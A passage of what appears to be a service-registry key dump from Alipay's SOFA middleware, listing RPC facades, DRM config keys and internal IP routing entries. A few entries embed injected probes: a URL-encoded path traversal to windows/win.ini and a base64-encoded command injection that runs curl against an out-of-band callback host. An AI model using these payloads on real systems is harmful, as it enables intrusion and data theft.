DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.7.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.24.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfinvest.facade.api.after.InvestSecurityValuationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.business.policy.PolicyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.api.ApiPlatformInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.facade.MemberCompositeViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lookout.agent#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.246.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mshopprod.common.service.brand.api.BrandPrincipalRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.core.drm.SlaveQueryDrm.starWishCountInsert,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.messagefusion.facade.api.MixRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.level1VelocityCorePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reservecenter.facade.api.AccountBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.query.metric.InsightMidDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yfdwebTBaseCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveRService:1.0:dcepcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.jobbulid.KgEventExtractConfigBuildService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.capacitystudio.register.AppRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.expansion.InsLifeExpansionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.AppInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.37.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfocore.common.service.facade.fop.api.mng.BannerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobileclientgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.diag.common.service.facade.MetadataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.105.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.243.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opensupport.common.service.facade.partner.PartnerZsbmInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCJiebeiMarketingPlatformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuVipUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.195.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.lifemng.channelDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vehownerprod.facade.vehplatform.UserVehicleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.cloudparse.CloudparsePermissionRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpartner.common.service.facade.WorkLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.50.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insmarketingcore.common.service.facade.InsSaleChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.scene.QuotaManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexclienttrdcenter.service.facade.api.ClientTradeRequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:libracore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kborderprod.KopPurchaseOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.budget.GrsltProjectBudgetSettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.dataqualityOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.ops.OpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.HotlineRightService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omc.proto.OmcMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.holoxtask.service.task.HoloxAsynContentCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.chair-script:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.biz.shared.repository.MatchProductRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.common.TenantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.token.spi.SecurityPolicyVerifyFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:faudiorec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_COOP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dasaa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.namelist.WhiteListService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.panda.SectionDataManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.edu.SchoolInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmerchantrisk.common.service.facade.merchant.MerchantEntryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.ValueCacheDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.252.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.131.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.settlementprod.common.service.facade.api.BizSubjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:sdabombardier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.240.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.243.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordermng.common.service.api.orderlink.OrderLinkSyncArService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.repository.WithdrawConfigRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.workbench.ContentConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcfaultcore.facade.awatch.AwatchDrillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmclifeprod.common.service.facade.api.LisaZmAppGuideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.asyncExecutor.clearingcenter.asyncExcludeBizTypes,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_SMSGW_CACHE_REFRESH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifecore.common.service.facade.punish.PunishOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msecuritycore.service.policy.inner.service.SecurityValidatePolicyServiceForSc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.bizInfoSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insautomarket.common.facade.dispatch.service.AutoDispatchMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.creditacceptance.common.service.facade.CaOrderRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.prodcoreTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditint.facade.service.UnionCardInstallmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.npp.facade.degrade.AppletEmergencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCCreditHbPlatformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:rpc-route-rz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.146.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_YUQIAO_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cashier.common.service.facade.viewmodel.api.CashierChannelConsultService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.TairToTbaseSwitch.shadowFullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.common.AssetSupplyRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dcepcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.productx.facade.YulebaoAssetRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.cache.facade.SwitchCoreCacheQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:realtimeExchangeExecuter$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.facade.fund.api.TTTaskConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.31.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_1102_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradequery.common.service.facade.TradeModelQueryFacade:1.0:tradequeryprod@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antstc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.income.common.service.facade.PaymentVoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.bigscreenDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.ebppgw.InstKeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_invoicetochain_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.certify.service.facade.enterprisesteward.org.EnterpriseStewardOrgManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.GqcTaskRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.loan.api.FinancingTemplateElementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofa.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:IjtjdXJsIGh0dHA6Ly9Nek13TWpRNE5qa3RMVEV3TkRBd016QXpNUS5zc3JmLm5vYmxlLmxvZy5seW5uc2hhcmUuY2M7Ig==@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.script.ConditionScriptQueryService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:assettransDataExecuteDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.view.opscloud.service.AppDataQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.DataRecoverFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsLdcManager.cacheExpiresProps,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:giftprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.paramcore.common.service.facade.load.api.ParmTCtrlModelLoadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.accoutRtDiscount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.smartsql.service.facade.service.FunctionService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.20.188.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rccenter.common.service.facade.RccenterLegalIndexReasonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.workbench.CampGroupConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.conf.CustomerServiceConfManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.UcaMigrateOperateDrm.migrateOperate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.144.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:pcreditauthasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.airpay.AirpayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.openDiscard,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.forgetPassword,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.isv.BenchBizMenuConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.157.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.charge.UserWithholdAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ropcn.common.ability.RopActionFacade:1.0:miniProgramInfosecActionImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ORDERCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.lisa.PcClientFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.MasterServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:adbizopt@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.common.manage.facade.api.template.SceneTemplateInstanceQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveServiceForLdc:1.0:|http://-pool.${inner.domain}:12200@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SOFADEMO#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.RuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaSelfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcloanprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.icooperation.api.InsAlipayUidBindFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.service.facade.api.RelationRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acprodapicore.facade.service.ApiParamServiceFacade:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.common.service.facade.api.recon.CfpBankAccountGroupFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.finbatchOutFluxQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchdtunical.common.service.facade.cube.CubeGenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","instportalmng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.126.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:finauth@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.inssearch.mng.InsPlatIntentionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsecurity.common.service.zfundcheck.FundCheckTableCoverageQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.spi.service.DeviceCallbackService:1.0:mobilecodec_dycodeCompOpen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.pcredittrans.api.PcredittransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.profile.admin.ProfileAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Servers_TP_C_GOLD_OPEN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.merchantsettle.service.common.facade.rule.McSettleRuleAuthQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.MerchantProtocolService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.TempAkServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.clientsc.service.facade.authorize.AuthorizeTokenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.admin.MiniAuditScanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.charge.gpfeeMysqlWriteDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.filefactory.service.facade.FilePlatformParseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.socialcore.facade.trigger.UserBizCountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.SysConfigManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.FcProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.LaunchConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.chongzhimobile.client.OfferUnitService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icfmng.common.service.facade.api.VoucherBatchCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.biztag.BusinessTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_REMIT_GPI_QUERY_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue50:threelevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.cif.client.drm.CifFixedQuerySwitcher.fixedMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.kmi.client.cache.PgpKeyCacheRefresher.keyName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instdispute.facade.api.DisputeMessageSendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.artvcroom.common.service.facade.IsmisTrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.couponcore.common.service.facade.CouponCustomBusinessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.lifemsgprod.common.service.facade.smart.CustomEventMessageService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_F_IACCTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ecocheck.common.service.search.facade.SearchResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoorder.common.service.facade.api.PromoTeamFacade:1.0:mrchorder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.TestCaseRoundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.FinadvisorShareQrcodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.WhiteListSwitchDrmResourceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:developertool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.UserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.DeliverProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.132.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundtaskcenter.service.facade.FundFilePathFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.acceptance.AcceptanceCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-findata-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.al